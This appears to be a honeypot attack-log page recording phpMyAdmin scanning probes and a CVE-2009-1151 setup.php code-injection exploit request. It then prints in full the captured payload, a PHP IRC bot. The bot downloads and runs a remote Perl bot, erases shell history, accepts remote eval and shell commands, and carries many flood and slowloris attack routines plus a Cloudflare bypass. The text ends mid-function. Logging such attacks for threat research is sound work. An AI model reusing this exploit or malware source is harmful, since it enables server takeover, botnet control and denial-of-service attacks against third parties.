1-10 of 89471 results (8948 pages)
phpMyAdmin scanner
[Attack info]
Attacker: 106.12.110.191
Dest. port: 80
Time: 21/02/2019 12:55:43
[Extra info]
ASN/ISP: AS38365 Beijing Baidu Netcom Science and Technology Co., Ltd.
Location: Beijing, Beijing
Description
This module detects attackers who try to detect phpMyAdmin installations.
CVE: N/A
Author: Unknown
Reference: N/A
Plugin ID: 1a0271bb9ff236c3d3a42b4bcb0751f5
GET /phpMyAdmin/index.php HTTP/1.1
Host: 201.6.177.246
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
phpMyAdmin scanner
[Attack info]
Attacker: 118.24.179.105
Dest. port: 80
Time: 19/02/2019 04:35:16
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Haidian
Description
This module detects attackers who try to detect phpMyAdmin installations.
CVE: N/A
Author: Unknown
Reference: N/A
Plugin ID: 1a0271bb9ff236c3d3a42b4bcb0751f5
GET /phpMyAdmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
phpMyAdmin scanner
[Attack info]
Attacker: 160.19.49.174
Dest. port: 80
Time: 18/02/2019 05:52:39
[Extra info]
ASN/ISP: AS135386 LinkChina Telecom Global Limited.
Location: Wan Chai, Wanchai
Description
This module detects attackers who try to detect phpMyAdmin installations.
CVE: N/A
Author: Unknown
Reference: N/A
Plugin ID: 1a0271bb9ff236c3d3a42b4bcb0751f5
GET /phpmyadmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
phpMyAdmin scanner
[Attack info]
Attacker: 119.29.198.201
Dest. port: 80
Time: 17/02/2019 16:55:56
[Extra info]
ASN/ISP: AS45090 Shenzhen Tencent Computer Systems Company Limited
Location: Beijing, Beijing
Description
This module detects attackers who try to detect phpMyAdmin installations.
CVE: N/A
Author: Unknown
Reference: N/A
Plugin ID: 1a0271bb9ff236c3d3a42b4bcb0751f5
GET /phpMyAdmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/31.0
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker: 51.75.68.146
Dest. port: 80
Time: 17/02/2019 08:32:21
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Roubaix (zipcode 59100)
rDNS: 146.ip-51-75-68.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
CVE: CVE-2009-1151
Author: Adrian "pagvac" Pastor
Plugin ID: oosheefee1baixeinief5nociu5shohh
POST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 231
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A24%3A%22ftp%3A%2F%2F51%2E75%2E68%2E146%2Fpub%2Fx%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: d9030cacb19a6bff1f4c5f78d1288ac7
Type: text/x-php
Size: 44240
URL: ftp://51.75.68.146/pub/x
# SUCK MY DICK HONERIX!!! :)))
# _|_!!
<?php
$cfg = array(
"server" => "91.134.146.175",
"port" => "1984",
"key" => "",
"prefix" => "|",
"maxrand" => "9",
"chan" => "#test",
"trigger" => "",
"hostauth" => "sidehost"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
$url="http://92.222.68.32/";
exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Finished!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
